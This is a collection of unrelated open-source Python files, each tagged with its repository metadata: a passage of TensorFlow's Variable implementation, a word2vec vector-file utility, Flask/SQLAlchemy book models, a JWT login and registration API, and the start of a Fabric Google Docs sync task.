@@scatter_sub
@@count_up_to
@@eval
Properties.
@@name
@@dtype
@@get_shape
@@device
@@initializer
@@graph
@@op
"""
# TODO(touts): Add @@value and @@ref in the docstring above once they are
# ready for consumption.
def __init__(self, initial_value=None, trainable=True, collections=None,
validate_shape=True, caching_device=None, name=None,
variable_def=None, dtype=None):
"""Creates a new variable with value `initial_value`.
The new variable is added to the graph collections listed in `collections`,
which defaults to `[GraphKeys.VARIABLES]`.
If `trainable` is `True` the variable is also added to the graph collection
`GraphKeys.TRAINABLE_VARIABLES`.
This constructor creates both a `variable` Op and an `assign` Op to set the
variable to its initial value.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
variable_def: `VariableDef` protocol buffer. If not `None`, recreates
the Variable object with its contents. `variable_def` and the other
arguments are mutually exclusive.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
Returns:
A Variable.
Raises:
ValueError: If both `variable_def` and initial_value are specified.
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
"""
if variable_def:
# If variable_def is provided, recreates the variable from its fields.
if initial_value:
raise ValueError("variable_def and initial_value are mutually "
"exclusive.")
self._init_from_proto(variable_def)
else:
# Create from initial_value.
self._init_from_args(initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype)
def _init_from_args(self, initial_value=None, trainable=True,
collections=None, validate_shape=True,
caching_device=None, name=None, dtype=None):
"""Creates a new variable from arguments.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If None, either the datatype will be kept (if initial_value is
a Tensor) or float32 will be used (if it is a Python object convertible
to a Tensor).
Raises:
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
"""
if initial_value is None:
raise ValueError("initial_value must be specified.")
init_from_fn = callable(initial_value)
if init_from_fn and dtype is None:
raise ValueError(
"dtype must also be specified when initial_value is callable.")
if collections is None:
collections = [ops.GraphKeys.VARIABLES]
if trainable and ops.GraphKeys.TRAINABLE_VARIABLES not in collections:
collections = list(collections) + [ops.GraphKeys.TRAINABLE_VARIABLES]
with ops.control_dependencies(None):
with ops.op_scope(
[] if init_from_fn else [initial_value], name, "Variable") as name:
# Get the initial value from a callable function. The real shape of the
# variable will be set later, since under the init_from_fn case, the
# shape won't be known until after the function is invoked.
if init_from_fn:
self._variable = state_ops.variable_op(
[],
dtype.base_dtype,
set_shape=False,
name=name)
with ops.colocate_with(self._variable.op):
with ops.name_scope("Initializer"):
# Colocate the tensors created by the initial_value() function
# with the variable itself.
self._initial_value = ops.convert_to_tensor(initial_value(),
name="initial_value",
dtype=dtype)
# Or get the initial value from a Tensor or Python object.
else:
self._initial_value = ops.convert_to_tensor(initial_value,
name="initial_value",
dtype=dtype)
# In this case, the variable op can't be created until after the
# initial_value has been converted to a Tensor with a known type.
self._variable = state_ops.variable_op(
[],
self._initial_value.dtype.base_dtype,
set_shape=False,
name=name)
# Manually overrides the variable's shape with the initial value's.
if validate_shape:
initial_value_shape = self._initial_value.get_shape()
if not initial_value_shape.is_fully_defined():
raise ValueError("initial_value must have a shape specified: %s"
% self._initial_value)
self._variable.set_shape(initial_value_shape)
# TODO(b/28152992): Remove the below hack modifying the node_def shape
# directly once set_shape() handles it.
self._variable.op.node_def.attr["shape"].shape.CopyFrom(
initial_value_shape.as_proto())
# Assigns initial value.
self._initializer_op = state_ops.assign(
self._variable, self._initial_value,
validate_shape=validate_shape).op
# TODO(vrv): Change this class to not take caching_device, but
# to take the op to colocate the snapshot with, so we can use
# colocation rather than devices.
if caching_device is not None:
with ops.device(caching_device):
self._snapshot = array_ops.identity(self._variable, name="read")
else:
with ops.colocate_with(self._variable.op):
self._snapshot = array_ops.identity(self._variable, name="read")
ops.add_to_collections(collections, self)
self._caching_device = caching_device
self._save_slice_info = None
def _init_from_proto(self, variable_def):
"""Creates a new variable from `VariableDef` protocol buffer.
Args:
variable_def: `VariableDef` protocol buffer.
"""
assert isinstance(variable_def, variable_pb2.VariableDef)
# Create from variable_def.
g = ops.get_default_graph()
self._variable = g.as_graph_element(variable_def.variable_name)
self._initializer_op = g.as_graph_element(variable_def.initializer_name)
self._snapshot = g.as_graph_element(variable_def.snapshot_name)
if variable_def.HasField("save_slice_info_def"):
self._save_slice_info = Variable.SaveSliceInfo(
save_slice_info_def=variable_def.save_slice_info_def)
else:
self._save_slice_info = None
self._caching_device = None
def _as_graph_element(self):
"""Conversion function for Graph.as_graph_element()."""
return self._variable
def _AsTensor(self):
"""Converts this variable to a Tensor.
See [`value()`](#Variable.value).
Returns:
A `Tensor` containing the value of the variable.
"""
return self._snapshot
def __iter__(self):
"""Dummy method to prevent iteration. Do not call.
NOTE(mrry): If we register __getitem__ as an overloaded operator,
Python will valiantly attempt to iterate over the variable's Tensor from 0
to infinity. Declaring this method prevents this unintended behavior.
Raises:
TypeError: when invoked.
"""
raise TypeError("'Variable' object is not iterable.")
def value(self):
"""Returns the last snapshot of this variable.
You usually do not need to call this method as all ops that need the value
of the variable call it automatically through a `convert_to_tensor()` call.
Returns a `Tensor` which holds the value of the variable. You can not
assign a new value to this tensor as it is not a reference to the variable.
See [`ref()`](#Variable.ref) if you want to get a reference to the
variable.
To avoid copies, if the consumer of the returned value is on the same device
as the variable, this actually returns the live value of the variable, not
a copy. Updates to the variable are seen by the consumer. If the consumer
is on a different device it will get a copy of the variable.
Returns:
A `Tensor` containing the value of the variable.
"""
return self._snapshot
def ref(self):
"""Returns a reference to this variable.
You usually do not need to call this method as all ops that need a reference
to the variable call it automatically.
Returns a `Tensor` which holds a reference to the variable. You can
assign a new value to the variable by passing the tensor to an assign op.
See [`value()`](#Variable.value) if you want to get the value of the
variable.
Returns:
A `Tensor` that is a reference to the variable.
"""
return self._variable
def eval(self, session=None):
"""In a session, computes and returns the value of this variable.
This is not a graph construction method, it does not add ops to the graph.
This convenience method requires a session where the graph containing this
variable has been launched. If no session is passed, the default session is
used. See the [Session class](../../api_docs/python/client.md#Session) for
more information on launching a graph and on sessions.
```python
v = tf.Variable([1, 2])
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
# Usage passing the session explicitly.
print(v.eval(sess))
# Usage with the default session. The 'with' block
# above makes 'sess' the default session.
print(v.eval())
```
Args:
session: The session to use to evaluate this variable. If
none, the default session is used.
Returns:
A numpy `ndarray` with a copy of the value of this variable.
"""
return self._variable.eval(session=session)
def initialized_value(self):
"""Returns the value of the initialized variable.
You should use this instead of the variable itself to initialize another
variable with a value that depends on the value of this variable.
```python
# Initialize 'v' with a random tensor.
v = tf.Variable(tf.truncated_normal([10, 40]))
# Use `initialized_value` to guarantee that `v` has been
# initialized before its value is used to initialize `w`.
# The random values are picked only once.
w = tf.Variable(v.initialized_value() * 2.0)
```
Returns:
A `Tensor` holding the value of this variable after its initializer
has run.
"""
with ops.control_dependencies(None):
with ops.control_dependencies([self._initializer_op]):
# TODO(vrv): Change this class to not take caching_device, but
# to take the op to colocate the snapshot with, so we can use
# colocation rather than devices.
if self._caching_device is not None:
with ops.device(self._caching_device):
return array_ops.identity(self._variable)
else:
with ops.colocate_with(self._variable.op):
return array_ops.identity(self._variable)
@property
def initial_value(self):
"""Returns the Tensor used as the initial value for the variable.
Note that this is different from `initialized_value()` which runs
the op that initializes the variable before returning its value.
This method returns the tensor that is used by the op that initializes
the variable.
Returns:
A `Tensor`.
"""
return self._initial_value
def assign(self, value, use_locking=False):
"""Assigns a new value to the variable.
This is essentially a shortcut for `assign(self, value)`.
Args:
value: A `Tensor`. The new value for this variable.
use_locking: If `True`, use locking during the assignment.
Returns:
A `Tensor` that will hold the new value of this variable after
the assignment has completed.
"""
return state_ops.assign(self._variable, value, use_locking=use_locking)
def assign_add(self, delta, use_locking=False):
"""Adds a value to this variable.
This is essentially a shortcut for `assign_add(self, delta)`.
Args:
delta: A `Tensor`. The value to add to this variable.
use_locking: If `True`, use locking during the operation.
Returns:
A `Tensor` that will hold the new value of this variable after
the addition has completed.
"""
return state_ops.assign_add(self._variable, delta, use_locking=use_locking)
def assign_sub(self, delta, use_locking=False):
"""Subtracts a value from this variable.
This is essentially a shortcut for `assign_sub(self, delta)`.
Args:
delta: A `Tensor`. The value to subtract from this variable.
use_locking: If `True`, use locking during the operation.
Returns:
A `Tensor` that will hold the new value of this variable after
the subtraction has completed.
"""
return state_ops.assign_sub(self._variable, delta, use_locking=use_locking)
def scatter_sub(self, sparse_delta, use_locking=False):
"""Subtracts `IndexedSlices` from this variable.
This is essentially a shortcut for `scatter_sub(self, sparse_delta.indices,
sparse_delta.values)`.
Args:
sparse_delta: `IndexedSlices` to be subtracted from this variable.
use_locking: If `True`, use locking during the operation.
Returns:
A `Tensor` that will hold the new value of this variable after
the scattered subtraction has completed.
Raises:
ValueError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, ops.IndexedSlices):
raise ValueError("sparse_delta is not IndexedSlices: %s" % sparse_delta)
return state_ops.scatter_sub(self._variable,
sparse_delta.indices,
sparse_delta.values,
use_locking=use_locking)
def count_up_to(self, limit):
"""Increments this variable until it reaches `limit`.
When that Op is run it tries to increment the variable by `1`. If
incrementing the variable would bring it above `limit` then the Op raises
the exception `OutOfRangeError`.
If no error is raised, the Op outputs the value of the variable before
the increment.
This is essentially a shortcut for `count_up_to(self, limit)`.
Args:
limit: value at which incrementing the variable raises an error.
Returns:
A `Tensor` that will hold the variable value before the increment. If no
other Op modifies this variable, the values produced will all be
distinct.
"""
return state_ops.count_up_to(self._variable, limit=limit)
# Conversion to tensor.
@staticmethod
def _TensorConversionFunction(v, dtype=None, name=None, as_ref=False):
"""Utility function for converting a Variable to a Tensor."""
_ = name
if dtype and not dtype.is_compatible_with(v.dtype):
raise ValueError(
"Incompatible type conversion requested to type '%s' for variable "
"of type '%s'" % (dtype.name, v.dtype.name))
if as_ref:
return v.ref()
else:
return v.value()
# Operator overloading.
#
# To carry over all overloaded operators from ops.Tensor to Variable, we
# register the _RunOp() static method as the implementation of all operators.
# That function dynamically discovers the overloaded operator in ops.Tensor
# and invokes it after converting the Variable to a tensor.
@staticmethod
def _OverloadAllOperators():
"""Register overloads for all operators."""
for operator in ops.Tensor.OVERLOADABLE_OPERATORS:
Variable._OverloadOperator(operator)
@staticmethod
def _OverloadOperator(operator):
"""Register _RunOp as the implementation of 'operator'.
Args:
operator: string. The operator name.
"""
if operator in ["__invert__", "__neg__", "__abs__"]:
setattr(Variable, operator, lambda a: Variable._RunOp(operator, a, None))
else:
setattr(Variable, operator, lambda a, b: Variable._RunOp(operator, a, b))
@staticmethod
def _RunOp(operator, a, b):
"""Run the operator 'op' for 'a'.
Args:
operator: string. The operator name.
a: A Variable.
b: Second argument to the operator. None if unary.
Returns:
The result of the operator.
"""
# pylint: disable=protected-access
if b is not None:
return getattr(ops.Tensor, operator)(a._AsTensor(), b)
else:
return getattr(ops.Tensor, operator)(a._AsTensor())
# pylint: enable=protected-access
@property
def name(self):
"""The name of this variable."""
return self._variable.name
@property
def initializer(self):
"""The initializer operation for this variable."""
return self._initializer_op
@property
def device(self):
"""The device of this variable."""
return self._variable.device
@property
def dtype(self):
"""The `DType` of this variable."""
return self._variable.dtype
@property
def op(self):
"""The `Operation` of this variable."""
return self._variable.op
@property
def graph(self):
"""The `Graph` of this variable."""
return self._variable.graph
def get_shape(self):
"""The `TensorShape` of this variable.
Returns:
A `TensorShape`.
"""
return self._variable.get_shape()
def to_proto(self):
"""Converts a `Variable` to a `VariableDef` protocol buffer.
Returns:
A `VariableDef` protocol buffer.
"""
var_def = variable_pb2.VariableDef()
var_def.variable_name = self._variable.name
var_def.initializer_name = self.initializer.name
var_def.snapshot_name = self._snapshot.name
if self._save_slice_info:
var_def.save_slice_info_def.MergeFrom(self._save_slice_info.to_proto())
return var_def
@staticmethod
def from_proto(variable_def):
"""Returns a `Variable` object created from `variable_def`."""
return Variable(variable_def=variable_def)
# Experimental support for saving variables as slices of a larger variable.
class SaveSliceInfo(object):
"""Information on how to save this Variable as a slice."""
def __init__(self, full_name=None, full_shape=None, var_offset=None,
var_shape=None, save_slice_info_def=None):
"""Create a `SaveSliceInfo`.
Args:
full_name: Name of the full variable of which this `Variable` is a
slice.
full_shape: Shape of the full variable, as a list of int.
var_offset: Offset of this `Variable` into the full variable, as a
list of int.
var_shape: Shape of this `Variable`, as a list of int.
save_slice_info_def: `SaveSliceInfoDef` protocol buffer. If not `None`,
recreates the SaveSliceInfo object from its contents.
`save_slice_info_def` and other arguments are mutually
exclusive.
"""
if save_slice_info_def:
assert isinstance(save_slice_info_def, variable_pb2.SaveSliceInfoDef)
self.full_name = save_slice_info_def.full_name
self.full_shape = [i for i in save_slice_info_def.full_shape]
self.var_offset = [i for i in save_slice_info_def.var_offset]
self.var_shape = [i for i in save_slice_info_def.var_shape]
else:
self.full_name = full_name
self.full_shape = full_shape
self.var_offset = var_offset
self.var_shape = var_shape
@property
def spec(self):
"""Computes the spec string used for saving."""
full_shape_str = " ".join(["%d" % d for d in self.full_shape]) + " "
sl_spec = ":".join([
"%d,%d" % (o, s) for o, s in zip(self.var_offset, self.var_shape)])
return full_shape_str + sl_spec
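# Worked example of the spec format: with full_shape=[10, 20],
# var_offset=[0, 0] and var_shape=[5, 20], spec evaluates to
# "10 20 0,5:0,20" (the full shape, then one offset,size pair per dimension).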
def to_proto(self):
"""Returns a SaveSliceInfoDef() proto."""
save_slice_info_def = variable_pb2.SaveSliceInfoDef()
save_slice_info_def.full_name = self.full_name
for i in self.full_shape:
save_slice_info_def.full_shape.append(i)
for i in self.var_offset:
save_slice_info_def.var_offset.append(i)
for i in self.var_shape:
save_slice_info_def.var_shape.append(i)
return save_slice_info_def
def _set_save_slice_info(self, save_slice_info):
"""Sets the slice info for this `Variable`.
Args:
save_slice_info: A `Variable.SaveSliceInfo` object.
"""
self._save_slice_info = save_slice_info
def all_variables():
"""Returns all variables that must be saved/restored.
The `Variable()` constructor automatically adds new variables to the graph
collection `GraphKeys.VARIABLES`. This convenience function returns the
contents of that collection.
Returns:
A list of `Variable` objects.
"""
return ops.get_collection(ops.GraphKeys.VARIABLES)
def trainable_variables():
"""Returns all variables created with `trainable=True`.
When passed `trainable=True`, the `Variable()` constructor automatically
adds new variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES`. This convenience function returns the
contents of that collection.
Returns:
A list of Variable objects.
"""
return ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def local_variables():
"""Returns all variables created with collection=[LOCAL_VARIABLES].
Returns:
A list of local Variable objects.
"""
return ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def moving_average_variables():
"""Returns all variables that maintain their moving averages.
If an `ExponentialMovingAverage` object is created and the `apply()`
method is called on a list of variables, these variables will
be added to the `GraphKeys.MOVING_AVERAGE_VARIABLES` collection.
This convenience function returns the contents of that collection.
Returns:
A list of Variable objects.
"""
return ops.get_collection(ops.GraphKeys.MOVING_AVERAGE_VARIABLES)
def initialize_variables(var_list, name="init"):
"""Returns an Op that initializes a list of variables.
After you launch the graph in a session, you can run the returned Op to
initialize all the variables in `var_list`. This Op runs all the
initializers of the variables in `var_list` in parallel.
Calling `initialize_variables()` is equivalent to passing the list of
initializers to `Group()`.
If `var_list` is empty, however, the function still returns an Op that can
be run. That Op just has no effect.
Args:
var_list: List of `Variable` objects to initialize.
name: Optional name for the returned operation.
Returns:
An Op that run the initializers of all the specified variables.
"""
if var_list:
return control_flow_ops.group(
*[v.initializer for v in var_list], name=name)
return control_flow_ops.no_op(name=name)
def initialize_all_variables():
"""Returns an Op that initializes all variables.
This is just a shortcut for `initialize_variables(all_variables())`
Returns:
An Op that initializes all variables in the graph.
"""
return initialize_variables(all_variables())
def initialize_local_variables():
"""Returns an Op that initializes all local variables.
This is just a shortcut for `initialize_variables(local_variables())`
Returns:
An Op that initializes all local variables in the graph.
"""
return initialize_variables(local_variables())
def is_variable_initialized(variable):
"""Tests if a variable has been initialized.
Args:
variable: A `Variable`.
Returns:
Returns a scalar boolean Tensor, `True` if the variable has been
initialized, `False` otherwise.
"""
return state_ops.is_variable_initialized(variable)
def assert_variables_initialized(var_list=None):
"""Returns an Op to check if variables are initialized.
NOTE: This function is obsolete and will be removed in 6 months. Please
change your implementation to use `report_uninitialized_variables()`.
When run, the returned Op will raise the exception `FailedPreconditionError`
if any of the variables has not yet been initialized.
Note: This function is implemented by trying to fetch the values of the
variables. If one of the variables is not initialized a message may be
logged by the C++ runtime. This is expected.
Args:
var_list: List of `Variable` objects to check. Defaults to the
value of `all_variables().`
Returns:
An Op, or None if there are no variables.
"""
if var_list is None:
var_list = all_variables() + local_variables()
# Backwards compatibility for old-style variables. TODO(touts): remove.
if not var_list:
var_list = []
for op in ops.get_default_graph().get_operations():
if op.type in ["Variable", "AutoReloadVariable"]:
var_list.append(op.outputs[0])
if not var_list:
return None
else:
ranks = []
for var in var_list:
with ops.colocate_with(var.op):
ranks.append(array_ops.rank(var))
if len(ranks) == 1:
return ranks[0]
else:
return array_ops.pack(ranks)
def report_uninitialized_variables(var_list=None,
name="report_uninitialized_variables"):
"""Adds ops to list the names of uninitialized variables.
When run, it returns a 1-D tensor containing the names of uninitialized
variables if there are any, or an empty array if there are none.
Args:
var_list: List of `Variable` objects to check. Defaults to the
value of `all_variables() + local_variables()`
name: Optional name of the `Operation`.
Returns:
A 1-D tensor containing names of the uninitialized variables, or an empty 1-D
tensor if there are no variables or no uninitialized variables.
"""
if var_list is None:
var_list = all_variables() + local_variables()
# Backwards compatibility for old-style variables. TODO(touts): remove.
if not var_list:
var_list = []
for op in ops.get_default_graph().get_operations():
if op.type in ["Variable", "AutoReloadVariable"]:
var_list.append(op.outputs[0])
if not var_list:
# Return an empty tensor so we only need to check for returned tensor
# size being 0 as an indication of model ready.
return array_ops.constant([], dtype=dtypes.string, name=name)
else:
# Get a 1-D boolean tensor listing whether each variable is initialized.
variables_mask = math_ops.logical_not(array_ops.pack(
[state_ops.is_variable_initialized(v) for v in var_list]))
# Get a 1-D string tensor containing all the variable names.
variable_names_tensor = array_ops.constant([s.op.name for s in var_list])
# Return a 1-D tensor containing all the names of uninitialized variables.
return array_ops.boolean_mask(variable_names_tensor, variables_mask,
name=name)
# pylint: disable=protected-access
ops.register_tensor_conversion_function(Variable,
Variable._TensorConversionFunction)
Variable._OverloadAllOperators()
# pylint: enable=protected-access
ops.register_dense_tensor_like_type(Variable)
ops.register_proto_function(ops.GraphKeys.VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=Variable.to_proto,
from_proto=Variable.from_proto)
ops.register_proto_function(ops.GraphKeys.TRAINABLE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=Variable.to_proto,
from_proto=Variable.from_proto)
ops.register_proto_function(ops.GraphKeys.MOVING_AVERAGE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=Variable.to_proto,
from_proto=Variable.from_proto)
|
ivano666/tensorflow
|
tensorflow/python/ops/variables.py
|
Python
|
apache-2.0
| 36,340
|
import numpy as np
import struct
import sys
from num2words import num2words
import re
def toDicVec(filename):
"""
Creates a dict mapping 'word' -> numpy array from a text vector file.
"""
dic = {}
first = True
vecfile = open(filename, "r")
vecfile.readline() # skip the header line (vocab size and vector size)
for line in vecfile:
for word in line.split(" "):
if(first):
key = word
dic[key] = []
first = False
else:
dic[key].append(word)
dic[key].pop()
first = True
for key in dic:
dic[key] = np.array(dic[key], float)
return dic
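# Expected input (an assumption matching the parsing above): a word2vec-style
# text file whose first line is a header ("<vocab_size> <vector_size>"),
# followed by one "<word> <v1> <v2> ... <vn> " line per word. Note that the
# code pops the final split token, so it expects a trailing separator before
# the newline, as word2vec's text output produces.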
def wordCorpusSum(filename, corpus, gramsize, hashbangs, vsize):
"""
Creates a word dictionary for the words in corpus, where each word vector is the summation of its overlapping n-grams looked up in the vector file filename.
"""
dic = toDicVec(filename)
wordDic = {}
errorCpt = 0
cfile = open(corpus, "r")
for line in cfile:
for word in line.split(" "):
if word in wordDic:
continue
key = word
if(hashbangs):
word = '#'+word+'#'
start = 0
end = gramsize
vec = np.zeros(vsize)
while end <= len(word):
try:
vec = np.add(vec, dic[word[start:end]])
except:
#print "the %d-gram %s from word %s is not in the dictionnary "%(gramsize,word[start:end],word)
end = end+1
start = start+1
errorCpt += 1
continue
end = end+1
start = start+1
wordDic[key] = vec
print "%d grams where missing from vocabulary" % (errorCpt)
return wordDic
def bin2dic(filename,wordlist=[]):
"""
    transforms a binary file from word2vec into a dictionary (keeping only words from wordlist if it is not empty):
returns: return {"dic" "vocab_size" "vector_size" "ngram_size" "hashbang" "position"}
"""
f = open(filename, "rb")
dic = {}
gram = ""
try:
line = f.readline()
infoline = line.split(" ")
vocab_size = int(infoline[0])
vector_size = int(infoline[1])
try:
ngram_size = int(infoline[2])
hashbang = int(infoline[3])
position = int(infoline[4])
except:
ngram_size = 0
hashbang = 0
position = 0
line = f.readline()
while line != "":
if len(gram) > 0 and wordlist != [] and gram not in wordlist:
del dic[gram]
else:
print gram
fullline = line.split(" ", 1)
gram = fullline[0]
dic[gram] = []
if len(fullline) < 2:
nextline = f.readline()
fullline.append(nextline)
bs = bytearray(fullline[1])
i = 0
while True:
while len(bs) < vector_size*4+1:
nextline = bytearray(f.readline())
for b in nextline:
bs.append(b)
num = struct.unpack('f', bs[i:i+4])
dic[gram].append(num[0])
i += 4
if i >= len(bs)-1:
break
if len(dic[gram]) != vector_size:
print "error on vec gram: %s lenght %d instead of %s" % (gram, len(dic[gram]), vector_size)
line = f.readline()
finally:
f.close()
return {"dic": dic, "vocab_size": vocab_size, "vector_size": vector_size, "ngram_size": ngram_size, "hashbang": hashbang, "position": position}
def cleanfile(filename, output, stats=True):
"""
    cleans a corpus of punctuation and converts numbers and '&' into words.
"""
if stats:
num_lines = sum(1 for line in open(filename))
i = 0
fin = open(filename, "r")
fou = open(output, "w")
delChars = [".", "?", "!", ",", "\"", "(", ")", "{", "}", ":", ";", "#", "*", "/", "\\", "'", "-"]
for line in fin:
if len(line) > 1:
for char in delChars:
line = line.replace(char, "")
line = line.replace("&", "and")
nums = re.findall(r'\d+', line)
for num in nums:
o = num
n = str(" "+num2words(int(num))+" ")
line = line.replace(o, n)
fou.write(line)
if stats:
i += 1
percent = i/float(num_lines)*100
sys.stdout.write("\r (%d/%d) %d%% " % (i, num_lines, percent))
sys.stdout.flush()
print "\n"
|
cedias/word2vec
|
script-tools/tooling.py
|
Python
|
apache-2.0
| 4,674
|
# coding=utf-8
from __future__ import absolute_import, unicode_literals
from datetime import datetime
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy import DateTime, Boolean, Text
from sqlalchemy.orm import relationship, backref
from flask import url_for
from ..core import db
from ..utils import to_bytes
from ..note.models import Note
class Book(db.Model):
__tablename__ = 'book'
id = Column(Integer, primary_key=True)
douban_id = Column(String(20), nullable=False, unique=True)
title = Column(String(100), nullable=False)
author = Column(String(100), nullable=False)
cover = Column(String(200))
pubdate = Column(String(20))
summary = Column(Text)
notes = relationship(
'Note',
backref='book',
cascade='all, delete-orphan',
lazy="dynamic",
order_by=lambda: Note.created.desc()
)
@property
def alt(self):
if self.douban_id:
return 'http://book.douban.com/subject/{id}'.format(id=self.douban_id)
return ''
@property
def absolute_url(self):
return url_for('book.index', book_id=self.id)
def __repr__(self):
return b'<Book({id}, {title})>'.format(
id=self.id,
title=to_bytes(self.title)
)
class UserBook(db.Model):
__tablename__ = 'user_book'
user_id = Column(Integer, ForeignKey('user.id'), primary_key=True)
book_id = Column(Integer, ForeignKey('book.id'), primary_key=True)
evernote_guid = Column(String(36))
updated = Column(DateTime, index=True, default=datetime.now)
status = Column(String(7), nullable=False, default="reading", index=True)
enable_sync = Column(Boolean, default=True, index=True)
# bidirectional attribute/collection of "user"/"user_books"
user = relationship(
'User',
backref=backref(
'user_books',
lazy='dynamic',
cascade='all, delete-orphan'
)
)
# reference to the "Book" object
book = relationship(
'Book',
backref=backref(
'user_books',
lazy='dynamic',
cascade='all, delete-orphan'
)
)
def __init__(self, user, book,
updated=None, status='reading',
enable_sync=True, evernote_guid=None):
self.user = user
self.book = book
self.updated = updated or datetime.now()
self.status = status
self.enable_sync = enable_sync
self.evernote_guid = evernote_guid
def __repr__(self):
return b'<UserBook({user_id}, {book_id})>'.format(
user_id=self.user_id,
book_id=self.book_id
)
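# Minimal usage sketch, assuming an active Flask application context and an
# existing `user` instance; the field values are illustrative only:
#
#   book = Book(douban_id='1234567', title='Example Title', author='Example Author')
#   link = UserBook(user=user, book=book, status='reading')
#   db.session.add_all([book, link])
#   db.session.commit()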
|
messense/everbean
|
everbean/book/models.py
|
Python
|
mit
| 2,714
|
'''
Mapping from protein to ligand or from ligand to protein
'''
from sklearn.cluster import DBSCAN
import numpy
from Modular import LIGAND2PROTEININFO
def GetClusterAnnotate(distance_matrix, cluster_cri):
min_distance = 1 - cluster_cri
    db = DBSCAN(eps=min_distance, min_samples=1, metric="precomputed").fit(distance_matrix)
return db.labels_
def HistNumClusters(labels):
pass
if __name__ == "__main__":
pro_dict, lig_dict = ProteinLigandDict(LIGAND2PROTEININFO)
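# Minimal usage sketch with a toy precomputed matrix (illustrative values only).
# GetClusterAnnotate expects a distance matrix, so a similarity matrix is first
# converted with 1 - s:
#
#   sim = numpy.array([[1.0, 0.9, 0.1],
#                      [0.9, 1.0, 0.2],
#                      [0.1, 0.2, 1.0]])
#   labels = GetClusterAnnotate(1 - sim, cluster_cri=0.8)
#   print labels  # e.g. [0 0 1]: the first two items merge at similarity >= 0.8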
|
ajing/MOADNet
|
pycode/Clustering.py
|
Python
|
mit
| 479
|
import json
import jwt
from app import db
from app.auth.models import Users
from config import Config
from datetime import datetime, timedelta
from flask import jsonify, request
from flask_restful import Resource, abort
class Login(Resource):
"""
This class contains the login function.
"""
def get(self):
return jsonify({"message": "Welcome to the BucketList API."
" Register a new user by sending a"
" POST request to /auth/register. "
"Login by sending a POST request to"
" /auth/login to get started."})
def post(self):
data = json.loads(request.get_data(as_text=True))
if not data:
abort(
401,
message="No params passed. Kindly fill\
you username and password")
username = data['username']
password = data['password']
if not username or not password:
abort(401,
message="Kindly fill in the missing details")
user = Users.query.filter_by(username=username).first()
        if not user:
abort(400, message="User does not exist")
if user.verify_password(password):
payload = {
'sub': user.id,
'exp': datetime.utcnow() + timedelta(minutes=30)
}
token = jwt.encode(payload, Config.SECRET_KEY, algorithm='HS256')
return jsonify({"message": "Welcome {}".format(user.username),
"token": token.decode('utf-8')})
abort(401, message="Invalid password")
class Register(Resource):
"""
This is the class for the registration resources.
GET: Provides the registration instructions.
    POST: Adds a user to the database.
"""
def get(self):
return jsonify({"message": "To register,"
"send a POST request with username, password and email"
" to /auth/register."})
def post(self):
data = json.loads(request.get_data(as_text=True))
if not data:
abort(400,
message="No params passed. Kindly \
fill you username, email and password")
if len(data.keys()) < 3:
abort(400,
message="Ensure you provide a username, email and password")
if not data['username'] or not data['email'] or not data['password']:
abort(400,
message="Kindly fill in the missing details")
username = data['username']
email = data['email']
password = data['password']
if len(password) < 4:
abort(400,
message="Password should be 4 or more characters")
if '@' not in email or '.' not in email:
abort(400,
message="Invalid email address")
user = Users.query.filter_by(username=username).first()
if user is not None:
abort(400, message="User already exists")
try:
new_user = Users(
username=username,
email=email,
password=password
)
db.session.add(new_user)
db.session.commit()
return {'message': "{} created successfully".format(username)}, 201
except Exception as e:
            abort(500, message=str(e))
#"User not created")
|
andela-gacheruevans/cp2-bucketlist
|
app/auth/controllers.py
|
Python
|
mit
| 3,482
|
#!/usr/bin/env python
"""
Commands related to syncing copytext from Google Docs.
"""
import app_config
from fabric.api import task
from oauth import get_document, get_credentials
from termcolor import colored
@task(default=True)
def update():
"""
Downloads a Google Doc as an Excel file.
"""
    if app_config.COPY_GOOGLE_DOC_KEY is None:
